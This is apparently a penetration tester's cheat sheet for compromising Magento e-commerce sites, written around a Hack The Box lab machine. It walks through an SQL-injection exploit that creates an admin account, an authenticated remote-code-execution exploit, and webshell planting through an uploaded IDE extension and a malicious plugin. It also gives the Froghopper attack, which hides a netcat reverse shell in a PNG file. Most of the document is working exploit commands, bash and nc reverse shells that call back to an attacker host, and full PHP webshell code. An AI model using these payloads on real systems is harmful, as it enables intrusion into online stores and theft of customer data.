# Magento

## Magento CMS

* <https://magento.com>
* Magento is an open-source e-commerce platform written in PHP
* <https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download>
* <https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html>

## Scan

* Magescan
* <https://github.com/steverobbins/magescan>
* Find Version, Files, Etc (local.xml might have passwords)
* Find the Admin page: <http://10.x.x.x/index.php/admin>

```
> php magescan.phar scan:all 10.x.x.x
```

## Create Admin

* RCE 37977
* Magento eCommerce- Remote code Execution-37977.py
* Will create admin creds using a sql injection

```
searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = http://10.x.x.x/
target_url = target + "/index.php/admin/CmsWysiwyg/directive/index/"

python 37977.py
http://swagshop.htb/index.php/admin/ 
Gives us Admin credentials!!
forme:forme
```

## Authenticated RCE 37811

* Must have Admin User/Pass for this to work
* Must have install\_date from '/app/etc/local.xml'
* Lots of tweaks and errors to get this to work
* <https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a>

```
-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..from local.xml

-------------------
Errors:
ippsec used path to admin page to help:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami' 

-------------------
Other bloggers updated:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors, had to update: from 72 > 2y
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
                                                 /\
-------------------
python 37811.py http://$IP "whoami"                     ..error
python 37811.py http://$IP/index.php/admin/ "whoami"    ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 5555
whoami
www-data
```

## Upload IDE

* Requires Admin login
* System > Magento Connect > Magento Connection Manager > **Upload**
* Download: [Magpleasure\_Filesystem-1.0.0.tgz](http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz)

```
---------------
http://$IP/index.php/admin/ 
Login with Admin

System > Magento Connect > Magento Connection Manager

Check Box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
nload:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz

---------------
System > Filesystem > IDE
Edit "Cron.php" 
Update it with an evil php webshell

Get your shell
http://10.x.x.x/cron.php

Submit a python reverse shell
nc -nvlp 4444
whoami
www-data
```

## Froghopper Attack (RCE)

* Requires Admin login
* <https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper>
* Upload an evil png with shellcode
* Enable Symlinks
* Edit Newsletter to call the payload

```
http://swagshop.htb/index.php/admin/ 
Login with Admin

-------------------
Create evil png

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage
New Category > Manage Categories > Categories > Catalog
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm it worked!

-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}

-------------------
Open template to execute the 'symlink' pointed to the evil-png

nc -nvlp 4444
whoami
www-data
```

## Upload Evil Plugin

* Requires Admin login
* MAGento plugins are basically php file zipped.
* Zip an evil [php ](https://pentest.mxhx.org/04-webapps/php-tricks)and upload it as a Plugin
* Did not work for swagshopHTB

```
http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";

	if(function_exists('shell_exec')) {
	$command=$_POST['command'];
	$output = shell_exec("$command");
	echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
	  <input type='text' name='command' value=''/>
	  <input type='submit' value='execute'/>
	  </form>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip
 
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php
```